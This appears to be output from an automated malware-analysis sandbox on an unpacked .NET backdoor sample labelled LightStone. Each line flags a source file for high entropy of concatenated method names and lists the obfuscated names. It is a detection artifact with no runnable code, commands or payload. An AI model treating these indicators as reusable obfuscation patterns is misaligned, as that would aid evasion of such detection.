                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, rOT5WLpcBxE9UdbAPhP.csHigh entropy of concatenated method names: 'sVDQW0DitW1Y9pbd4Lw', 'kJaq5qDKP7DxemQXRKw', 'KOW1jpD7huRwZGiYlNT', 'y2o9cJD3KORT97JgsBW', 'cnb4UKDtVrtLGnuBtu2', 'fLiCqlDOX0vMuUBbgCB', 'v52D9yDY4flacIPq1id', 'BKsVUPDd6BuGMfKTKCX', 'xOhZFODFsNMqsKWD6jA', 'YHncLgDEHZDZeib25FJ'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, v5HsFopo2BtnkOgb1ds.csHigh entropy of concatenated method names: 'Cu9GuMXVu39iKUYvt7q', 'rRVoCVXW87r2svIqF38', 'OKJ93DX9U5IlMgqvxWJ', 'RuDnUxXlccDOh82BIAu', 'y9pTyIXxrcFDnFWn8jc', 'HpBfskX4Tia56j6ysIi', 'gtlUfrXodOoihdHTHvu', 'yGRkSdXQ4tsQjwsmnoT', 'DLEOJDXjAK6jrf7hE8Q', 'A1TwQFXcSKon22q6TfC'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, r9ftfy60Ybjb82jo6bm.csHigh entropy of concatenated method names: 'yrwD75blJdLoM2fuY3c', 'VEya3cbx957qIG09IsR', 'MgUiF5b4aAdlwwOiQRu', 'vfU8o5boYuVH3mjf6e7', 'JSkJIdbQc8mnFhRVdVP', 'XorZKibjHkJg10Fq2gR', 'qCZQMqbW5X9MKETVQLG', 'BZmyYlb9OdU4V3PhNbH'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, vrvM7qYayImISJgKnN.csHigh entropy of concatenated method names: 'XHh51Zjgv', 'IZXI0wPkM', 'QUBwS0IOo', 'cgFoNbIgs', 'zUgNDYZVj', 'SNNGhnn2A', 'EOBEkdi9f', 'Fc1N4mqDDm8p1lMrOVD', 'RLGiknqTngVwqNmA64b', 'Dtrj6YqX0Mk79ZrgiA2'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, OoHhLSXLXYHU0YAyXcN.csHigh entropy of concatenated method names: '_4x2q4', '_268H5', 'u1RBrNmOjY', '_667yS', 'GGeBefnDDK', 'RpYhyJoyQwFoLLh8Q3i', 'hX6g0ioqyBbomdqPp7P', 'tAbylaofid06g26Mdc3', 'p42kTEoMBvpEBKUlANi', 'xUGiu5owE6C4V8geX16'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, rkQYaDnYOqVLBFLImBT.csHigh entropy of concatenated method names: 'PCFC2gpkMF', 'CCOM3wLHFOLmjFLMQWI', 'ATjtIeL8yvM0OWYHHvU', 'xNFawtLC4JyWMPOSg00', 'zStqqTLRDrwupSKLJjq', '_6D3w9', 'aZACm1v6kb', '_4K2q4', '_13y96', '_57u4M'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, RIkehgpLf3MiFkKqZWl.csHigh entropy of concatenated method names: 'bsdVo7XThyb2bRSBFRU', 'zEGPMkXX3YRRYjif9Ek', 'gHayXiXBDFhlEgKZUPV', 'JiAPlAXuw8pdfbgdIaE', 'HCn8gYXGTmKO5HhGyak', 'ny4nSUXbDV0XCZCwvi3', 'hcg3imXrmcD8pqTmjsu', 'OxsUC6XhZ9vj7NCr7Rn', 'fvDI3iX2htAW43jGB7c', 'Ix7xL7XvkM3k1980yKM'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, TnsR5ZJXw5HyMOhXPR5.csHigh entropy of concatenated method names: 'CRMT8FnsQT', 'sLuxSAF3xl5GtS94ls8', 'gds6SmFKBtsbwpmgyxc', 'pvuolNF7xohT0YUHGfw', 'uIldMKFt5fb3JrrsxVI', 'gWet8OFOlcSwTDlrKDq', 'EJ7TVbmMDE', 'Jy8TLJsT0c', 'JDrTtQO1Xc', 'BL0TFZvJmT'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, FI6khW5g2BqeucpMup.csHigh entropy of concatenated method names: 'mMV0qpMHakMsI658Ytg', 'IfjNGmM8nWrHDLswoil', 'M0cvkCMpFa50Ybk3FcB', 'x25qXdMNmL3hrc8KUtN', 'l9v77RMgUlWT6oLjYq6', 'cnxm9JM6HVI6xqV23Z7', 'xM7lVSMCftC98r9XfZY', 'FHIea5MR5V5rQmpe4Bs'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, x8G8c8pF9hB3UFPeq1r.csHigh entropy of concatenated method names: 'o7sBpxTtywPf58FxESd', 'sAfVI9TOl3xrCuT5uly', 'jqmO1OTY9PBAm9qd4E5', 'JgcqIgTdu819HkVpyYB', 'rf2QbCTFHgDehouXA0C', 'J8XqLGTENul37xdORGs', 'JkQM9wT7cK0rYGHpmxu', 'coYpZWT3FCvPmD1nQM2'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, fmGu9ae1cnRhieG3Z7m.csHigh entropy of concatenated method names: 'H5cFMgyhhK', 'E2xFKGd4ls', 'SBvFqAWopJ', 'owSFafrJtD', 'nLfF2RPUko', 'FCf28lCerB8cRrhI1JQ', 'YZjEXVCEjw2stPNDBSI', 'DS0Z5FCcUythBc4ei3b', 'fr5T2VCVc4kg7uh7aMF', 'UGUeKuCWsdjcXDTwDn9'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, SDMxS4pyijWZCt657b2.csHigh entropy of concatenated method names: 'E3OUFATBq8Detsyacnu', 'TQkye5TuCTq0uyyDeQu', 'Fv0igDTGxHD9Sf32cJS', 'EHY1yaTbFKnr4ESDwWe', 'VwkB8mTrqjwJixvsAft', 'EboVhiThog9SaEe3XTQ', 'eL69THT2j5567mBHQbG', 'oA2ps1TAEsxGfTUJULy', 'tuvrZkTiOpDv9ZEjno0', 'CyEyOtTKFtjFla7snww'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, gyY9w9p8VX9bNu22HI9.csHigh entropy of concatenated method names: 'dpn5Y9Bc3FfXfu49M7j', 'M6owMFBe88fJjDejMXs', 'O3HY2XBVXV7sy1UMwqM', 'hOPYHHBWb9YQpum6MNk', 'nZX2EDB9JM9OD8nenjb', 'mwCvmdBlJBropYtTywJ', 'gOBMKeBxvFOlwpaFXOP', 'aYvHZ9B4vHJ6Sv4xoNx', 'OUevNCBokmq0kDDnorL', 'JXYYAiBQhAbcX5lF9eM'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, gchqS6nT2NBsTpC5mte.csHigh entropy of concatenated method names: 'TeBqx', 'd8385', '_3244h', '_8H415', 'yQFSo', '_2hWBH', '_1WKVN', '_53i2R', 'CQ144', '_94h2e'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, W9w4gNea5CBDNL5CCJ1.csHigh entropy of concatenated method names: '_7Xbf5', 'XF52A', 'w5c93', 'dk1Te', 'txKF3lpKNn', '_31z82', 'xTPFUp7Ju8', 'rGTFV2vLOZ', 'P8314', 'ReC64'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, bDsfZ7S90wvIudsBGm.csHigh entropy of concatenated method names: 'npMBdAMZWS9taAbPK44', 'hPvTQvMa2RMdpoDo8fd', 'WfaCOVMn0VvX3069pqq', 'c5le8TMJ9vKghExiqB3', 'uGdN0qMseX3FwvT3O8c', 'l4QnH2Mk43NNsPwABrR', 'mpWXDhMLdEg5XZgPZui', 'yNhYmvMSYisAA1ym8HR', 'guKa3QMmXFC58tGX6BU', 'MUlMQyM0iiMP8Noajdv'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, Uxvqoee8x43E1ZlPMQX.csHigh entropy of concatenated method names: 'EojkS1gloAKeHHPEt7f', 'L3H1IogxN4AHjf8q4IA', 'babOvGgWj4uM0FLcSM2', 'fO9iaNg9SpxgUqfCjX9', 'GBbYkH8hMS', 'T3ten6gQvD6FSgVLIbW', 'sHuNuugjpuYZVfGVZUL', 'b8DFNhg4c4TPhysNegM', 'a00ujCgomfJeT9k81FT', 'FGcC1ogCeDJYcWAY0oE'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, Lg7gtOrrvnsVl5RcAU.csHigh entropy of concatenated method names: 'aytAIH1fKnqhKAwrHgT', 'MsvsFr1MC3OEgIA9YXn', 'MVwdWS1w0fBWdA69MqZ', 'iiKrKt1UkjvDS4eYls0', 'qmLG3g11wpBJNVkBAsA', 'ag4SjJ1vtjMJqxqP6v4', 'IOr15d1DqHbLYiyqsV2', 'rZM2ZO1Tka6uq7Aay6r', 'iBKmCn1XNgWBwPLc6iN', 'vvanNU1BnB8d71Wodrc'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, BlTCdfXD5ot1lFrO5fS.csHigh entropy of concatenated method names: 'e6dhIOoI4730gi5YEd6', 'OCDNOToZLZ6HhtbBVty', 'RbmN99o6wdhkjlQvgOE', 'dSuA0doPJ8yn1130FDL', '_7V96S', '_5l9Bc', 'itZUNi2R6U', 'QGcUGFdy8F', 'QWc6N', 'GT3UEiBqgR'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, l2ZhI2JbMZw1hOmChxl.csHigh entropy of concatenated method names: '_159q5', 'qvd4H', 'Cq1SQ', '_86I14', 'sUB62', 't8alidVv5AXqK0Bo6JN', 'b1bQG9VDs7jDeRn3xOH', 'aSsSNxVTFiBNAHjCUB2', 'Kg4GTKVXjYpoi0nObZL', 'yN52YhVB0wxEdtRjxvD'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, pCEntIncWR2ad0XxBTc.csHigh entropy of concatenated method names: '_273rl', '_363k6', '_27U99', 'IjVsrHBFwX', 'nMNsu2eibg', 'Sk1sglsnsS', 'fUYs4S1KNH', 'S8IsB91vOi', 'qH2scIam30', 'h843tFkIClVuvrYosnP'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, SH4oW769N66mQFcNQo3.csHigh entropy of concatenated method names: 'PhDmywrIyI', 'vc5mJgQJGu', 'noDWDTAJgVbE8ygYpPL', 'EERJ5tAs2n08aXpRFch', 'KqCLhrAavaMtusSUV77', 'i03U9dAnXaAr1ddg6KP', 'dI7QWoAkrM2uowQwWec', 'Vd8AgkALd0XQwi9MhTg', 'tDcmrDmleN', 'tgZmu0hnMn'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, loKyPlngYxJix9VDC0k.csHigh entropy of concatenated method names: 'BN9EbNej0x', 'cQdEC1E3hO', 'IdrEZSNrgf', 'SoDE6pNFZ5', 'cQOEp0vwEM', 'yHQCudsU89dyxE0FVw7', 'chaoahs1wl824UQJMP3', 'eAiDg2sva6OWkLNJfXL', 'dtkUvrsDnwNAB1m6dhP', 'm3gdkbsTh6mMZLi3odF'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, tNAtGTj1Iej1N1A45oj.csHigh entropy of concatenated method names: 'CELN1lk8wI', 'cpONyajmJI', 'P1fNJ3stdC', 'J5LNjQ6k9o', 'BOiNRnqZYg', 'arlAiGZChjEmRB2uS6G', 'VL9PKtZQhhwncEeb9FI', 'xqn9CoZjmpQVuiZeokF', 'CBC7yVZRonh1BbToP2B', 'FFkMANZHFpTR0lnvfaG'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, ImvIs8jqOkq0KW6fQAe.csHigh entropy of concatenated method names: '_92A8S', '_64582', '_4O32F', '_14174', '_78Cp4', 'q51EJ', 'gE9Ex', '_532P9', 'U75ay', 'lPW71'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, QUrewk6lgCd0EDqiuSY.csHigh entropy of concatenated method names: 'M99xJLukCc', 'c62hoBuJysQnUnh15T5', 'ICZ2uKuseAZWduGPSFi', 'W0krOUuaVReIMjnTKiC', 'iMx8WUunVmLM5nNbn8s', 'TMNpuKukfaEgA7kTg4y', 'yirYaju80wa9FmA5HjZ', 'MbGZAjup6HQWmykA1HS', 'rSkTxUuNeC7VrI9Thgb', 'dMR9wMuge4q55cpciX3'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, nv0tynnUQhlAFI0cbPb.csHigh entropy of concatenated method names: '_57MHj', 'q5s1u', 'St0ZnI8Dem', 'BciZHTY8Fg', 'muPZWte6HJ', '_453K7', '_89Y7m', 'G27J3', 'r42C5', 'j36V7'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, lrUvBkprZ6KLKcJHaH6.csHigh entropy of concatenated method names: 'tG91XruOK9FwXsV5fHP', 'JoR1W3uY2b7rcUkWSKv', 'Cv9A8Judq7lFweQ5Z4t', 'vHY6UouFLGCJFmrpW5H', 'Or35pkuEA6kklxiMPjY', 'RA0fcKuc1Es0mQ37U1p', 'HmG8W3ueLPIoBJqOSdw', 'tuBYOsuVFyVF0Xrd9Ej', 'F7MMyYuWf0colLKjsCc', 'UOdGkQu9ejH6Gi0mQCF'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, T0B2raXswhAco2PivCK.csHigh entropy of concatenated method names: 'wupU4JsdvB', 'dcNUBf91Y4', 'CuaUcys0hw', 'LMvdLcoJxQ7dVESfEFQ', 'yqWcXlos5xtt528Yy8l', 'KilayAoa3BZUWAqwVku', 'sgS6YbonopPtyxmTYFL', 'z4erEfokTbxaO1PISma', 'xabWWxoLYJavduroAiu', 'J6nEv1oSTjKhk3o1kP2'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, eA7fRWJZWeARQ2rPlfb.csHigh entropy of concatenated method names: '_6YPy5', 'mQKs7', 'jK5BXeSV6H', 'X2IBVOohO3', 'mBaL2vlsH0jG0qkgDF4', 'bLwaUNlk96GZDQPnDWy', 'RrcumtlnjrswOMxCQaY', 'kmfZ8ElJpeGO09otlRM'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, PZ0iuGnOTgKLUTmNMCf.csHigh entropy of concatenated method names: '_1u5g9', '_5WPX3', 'NBREk89VZ5', 'd478N', 'q4445', '_76715', 'z74dM', '_1Nx41', 'u3a27', '_4181m'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, QIOh5PJONRvYwxaAYg2.csHigh entropy of concatenated method names: 'PetTM7BnhQ', 'X97KLyEZufv6W2dZUZw', 'zTC8MTEa7QWl9CYEQL3', 'xCcg4ZEPY2Ik7kRmJZE', 'EGQQGwEIQB2IctpdMQu', 'LQsF0IEn8bJbK7cFyyP', 'edRoSFEJWGWvnhO12bV', 'meRTqk3vW4', 'Cga6s1ELAIQeKOcSQUY', 'ErRhgEEsiYFbVmh68wY'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, Inqyb4XI5eESdox3xEO.csHigh entropy of concatenated method names: 'F26xw', 'B5292', 'H6F79', '_1zUd3', '_8bm8g', 'iOAY5', 'r8cie', '_76968', 'CKX5K', '_2PCqo'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, EwQB3b6sLHNOxFi5dZ5.csHigh entropy of concatenated method names: 'tFnmlMsDuZ', 'kgOmTcgeiM', 'daVmQVN7Et', 'OyimSPLWY4', 'wwum3FGltg', 'anA297h9dkB9JuaZOQu', 'NJPvo4hllP53jTs32s9', 'uSMltghxf0Jj3J849oD', 'UwHRGGh44r7uhaKuUTB', 'yIeEPOhV8iOPW0HABD9'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, MCEvOWXFaw29xeLlWIP.csHigh entropy of concatenated method names: '_1pl2V', 'O5OBiSdr5O', 'ImbUTp7Slt', 'uoDBDXfpbD', 'FuVSXPx0DvVLWHtNkKF', 'yMFo6Lx5UPpkmgJcSgq', 'YVWmNWxzkooMSmdcT0d', 'QvaLnZxSx4p19m5IZkd', 'zdDSoxxmBMLVP31boJj', 'sDkBED4ykrlscoU6DWx'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, AiVs7UJNDqxdLrZjkFf.csHigh entropy of concatenated method names: 'uiK3S9U2Fr', 'Fqy33oBvVP', 'xaD3U8qcqA', 'T0c3VpU14w', 'kv83LgAN6L', 'MB43ttsNV0', 'k1fFaAlTbxKbvEA17jC', 'f2Fnt8lvG5kIpCl5sAt', 'm2wxs1lDXBH2lKa9m4q', 'qiFM5flXDyTdiWKmFmg'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, DqEMRRj4aBPTBQb4yRQ.csHigh entropy of concatenated method names: 'U1sx4', '_5M51r', '_9NsU7', '_2cES4', '_7K7j7', '_77T77', '_14JT1', '_26u8V', 'Af734', '_4ZEZl'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, enkxHwEreFR1flhCcF.csHigh entropy of concatenated method names: 'T7pBxMIXO', 'MP3k76fHdWy8un49VRF', 'eEcMVufCxrsNEuPM5uo', 'vRbIQSfRboLuINkrUP9', 'sjI0Pef8ogsnpihdRAZ', 'Yp0RH9fp64K9IQs10Q4', 'd8txKwfNYojJYhfOPZ0', 'lYJfDsfgkLMntDbLyx0', 'HVlXcgf6O7Hc5IXow00', 'PqRYhqfPo5WctXX8YB7'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, FvjvPf6wAuih2KNfko0.csHigh entropy of concatenated method names: 'RGDDDhS78a', 'wW1DPyFeGB', 'Dyv9DHiDW24d4A7SbpM', 'yt02baiTWiE1gVMhS97', 'RkwJ52i1ZfeHHBTAMST', 'u6nVjTivmGRNcJrs9sK', 'dbuHSCiX9v5O9TRijF9', 'Nvk9iJiBGm5CKUCEa7A', 'EkKPR9iublANqMgiS0V', 'oAnqKUiGb0QxscZZFKm'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, euskOljS3RyscI12L1q.csHigh entropy of concatenated method names: 'RyjG4AA28G', 'gfqGBrv7yR', '_1a7kH', '_5NJ51', 'XFr4n', 'BhcU4', 'v1t16', 'tbRGcST6Hm', '_4I55s', 'y6FW2'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, faRXrc63Tq6010aM3rD.csHigh entropy of concatenated method names: 'rkS4cDbMNPxlR2RNF35', 'MCtA0Gbwth00QsEmffm', 'uSvkVwbU8BRWSQNICep', 'LllxJib1DTZm7maixGo', 'dYU27gbvulWaUqTkIbc', 'CaPytobDbkec4PYWu5w', 'tqF8jybTWHacCd9W9bx', 'boGQf3bXXsypoM3bVaR', 'LxOqmAbB8v5656fuAAl', 'eCEkB4buaTVoLcNIk9J'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, b6BqYEACtIwSlgkSxS3.csHigh entropy of concatenated method names: 'crgdgnA9bC', 'vIGd4uZcGJ', 'AQ1FFldD8wGrjUlD4T7', 'yIQ0WEdTVRWv1UbQ6n4', 'NZ261gd1RWCPU2jZ3Tb', 'dwo7Sodv6F8HRgTPJq2', 'KT5dapOrAa', 'zB7d2Did3o', 'qaQd19LvX0', 'Qq0ik1dbyQ6PVeRq7dP'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, bjF6rxplTQaj9Mc0gwg.csHigh entropy of concatenated method names: 'WAjeu1P1Eb', 'lSuegBgTJp', 'i0Ebog1RrJKJRQYKDDS', 'tkeoSg1HhLoG3PIyB5g', 'RGYvIC1jcP32OOab7eg', 'xXs5PM1CeohOqiN9hYL', 'MRoZP618kaw3ORYMHlO', 'mqRy221pFJJGjCTAk3I', 'N7QppN1eyiYwDeE3l0g', 'MCq0ra1VgOKV1mmkCrN'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, l8gO24JyxYbOaELTVcS.csHigh entropy of concatenated method names: '_8vc9J', 'r5NQjhQlyT', 'B7jQRhnjUL', 'KQ7Q9m4HGU', 'zLrQzxQCCk', 'H6AShmiKNA', 'iRcSe5SgD1', 'b4vSxCQl6G', 'ua0S0saUQY', 'inmSmP5a6t'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, g591yxj7S9MwD9Sg9u.csHigh entropy of concatenated method names: 'ThXUmqeIF', 'Bg4hOP4C92AatnyWvE', 'KI5iMGlNDv5dVrFYol', 'H0Q8i4xI5PykimxCVj', 'SCah3hoVT1OPAjHAcW', 'DqPAt6QqOyo9P7SsNY', 'nyRxhdTff', 'a4k0imnZ4', 'eLAmhF6mN', 'FWoD9HFPy'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, Gpf4LM6WPs4ZKoQlRJk.csHigh entropy of concatenated method names: 'uAXDSuPHYs', 'jCbD3INtpY', 'OjvDUnxWcw', 'Sb9DVSnarx', 'b7UShsiQF6laS59LnPa', 'zMHJLwijJ98tlEpK9il', 'vukaDBiCRfsIKCVg0Zd', 'W6b8q0iRwCKM2YKhCSH', 'v0uKIviH1O2xX8aJqrn', 'Cjb9Hui8Oiuy5D21NBj'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, V2R4AG6V3ATIPna3bPO.csHigh entropy of concatenated method names: 'RfcmA8R37M', 'wNlmXUFI1P', 'fujpd0hspaISl6tp1As', 'p5KctfhkYx0HUFnfhEU', 'i33GkFhLyQHBM2Y83Nq', 'RtOnqHhS46K2MPTElsa', 'yBfTfMhmwGtPLebJui0', 'CRrkbyh0gws9TjBKGRL', 'GDCYVRh5eVU3guuDa3v', 'DtXJbxhzumDIxhiEdAt'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, SfNng1JcfhZvhQsdcD9.csHigh entropy of concatenated method names: 'YOxQOvUAWq', 'wwlQYIyGLr', 'PDSQ5yE7hf', 'XixQITPHRF', 'MpOQwmfYZI', 'mrEQotFB8d', 'g8uQNIpq9K', 'oiaQGuA2rb', 'uDmQEK4TCt', 'JWGQskhuQG'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, roXQDD62yvVnYwfS0CG.csHigh entropy of concatenated method names: 'rOV04W260M', 'Okw0BlSiuj', 'HGs0c4RLUX', 'rdN0i4s0dV', 'CLb27krbLKwuPWIEM4Q', 'ARPererunCaCDZUio0v', 'my10DbrGbFMxfbHw8SA', 'P3H9O7rrNGeb4elQWXy', 'vI1lNErhVMv9MyUUegC', 'UDvyxGr2nsrVv5vvBHZ'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, UWosx36A7sESuUhi8ha.csHigh entropy of concatenated method names: 'N6IxzXOJuV', 'VpCWJ0GwSiZ572bpiEV', 'Qr4xvtGUr9hEJaoQMS6', 'KcB14bGfo0EJmIwDBku', 'BlL2fNGMkbhZye232TW', 'twHkgHG1Z664jO1FVfL', 'KepkySumpnZvw8MKIrw', 'gPmhJ2u0UvHPQlrnO3P', 'CWnZpeu5LQUYuYaMaFf', 'vuTf7fuzsK1woCuX2RD'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, LOMw5MpA0AyHYo8tHGb.csHigh entropy of concatenated method names: 'QgceMoMTX9', 'ggJSZ21m6Of1a4dtI0D', 'dm1EN6107l77g0dZpds', 'VJClfk1LOBkHSbccR4p', 'r3CIDk1Shk1DI91oo9g', 'EN9ooI15qvVu9WiFY50', 'fSW3sb16vuxykKJp4Sa', 'asrH581PemKyoy1O0J2', 'ihIa931IdpnoKM6akWf', 'OcDRbt1ZEEkEtvcEP7O'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, mAMIyuN52eMn2jbS22.csHigh entropy of concatenated method names: 'gDaNFJw4OaGw5cAoSHT', 'eSeVfXwoHss0uZ6Sgcm', 'lUd76VwQXeH7F36EPdo', 'tmWxqxwjB2N4mxhCom1', 'xTBXk6wC3Fuc6LH40QQ', 'e7xWc9wROALEwcOhZqj', 'bEWhFAwHjkYHrMhQZaJ', 'jnVA4ww8beRjQ7CSRbJ', 'UNdMaxwlqD6RlN1Fna8', 'oD2BuwwxGQEtgef7Cyx'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, oB93K6Qjj1tnFFJuvO.csHigh entropy of concatenated method names: 'qAr6yCePl', 'KPbpO1YL6', 'rHJkn7civ', 'SQXDSWqRXp4nhiZFqw2', 'UWceREqjU3ZoQ9eVxmr', 'HhGZWpqCu0cd9n2Jke1', 'FWUHqOqHXLLKqyQ46RZ', 'pSehaAq8yNIT8cC9FZs', 'cKxOQiqpCRPYpara1t0', 'NRTpP0qNl747XblCnqd'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, u4QFwHJKGWDnKB3LCY3.csHigh entropy of concatenated method names: 'mw18k', 'DzSZD', '_6287C', '_9EWfW', 'z89rS', '_6OJt5', 'w5Csg39RI5ib4eShLwx', 'WYaT0l9HUQwpsWpqtyE', 'Wbi9yO98AMAQACpIkrT', 'nJ4kUT9psaBNMi6gZC9'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, J59uibp7L99q3A3XtqJ.csHigh entropy of concatenated method names: 'imxxHNqKvf', 'v7xldoTNs2gJmBS0doR', 'uobJdjTgn7HsJQd8jxV', 'STWxViT80Dqi9x4H2pV', 'Nag4SGTp4hOVsg3RTFE', 'BYbOalT6qrhhWMptO15', 'gFpixBTPDedaGFESMrX', 'dNrl12TIQMOLkbffWmn', 'VfkyffTjZ64mHdayHq2', 'gUIkA1TCnfVvNj3Muni'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, hFs7WpqlBmYX0x9aNr.csHigh entropy of concatenated method names: 'ed8aleMDsRaGhTVkfyT', 'oTHRHAMTl5rwxm9pdkB', 'P2on55MXjxMhouCtGZl', 'LN5Jr3MB2RGxEJ9BMFh', 't21fXfMuNTuYsRMrfWb', 'DJ35huMGKHH7skiFkqU', 'U7raTPMbWbMSSHM48ok', 'FUCvxMMr2NgCCYJYxu7', 'aL6XhPMhn6wpuCFv7KC', 'NMxik4M25mDhoNl4dXG'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, QHJcbBAlHAk6yNXBBIR.csHigh entropy of concatenated method names: 'rPGDtLonRk', 'ACSDFjqITZ', 'Dp5DAt3aR2', 'pynDXBTvjI', 'HtpD8K76yi', 'V5NDntG0NQ', 'yA2DHaCpCd', 'YXgksrinBuctxtHtAvm', 'UQmvU1iJqRxt1DomoOe', 'eQWmqTisElBAD5SOrC2'
                        Source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, hsA9oejH2YetWVDywJx.csHigh entropy of concatenated method names: 'KW2G3QxkbO', 'iVCTdOaU1AshuGxkXgf', 'oCrc0laM8NeEu74JEfN', 'OiEJ22awVVa7MsFok47', 'DMUmA9a1yIioNjSfjTs', 'c13BiYavUXyrp179Zq5', 'QSRlDmaD5ZgGaoN8qsY'
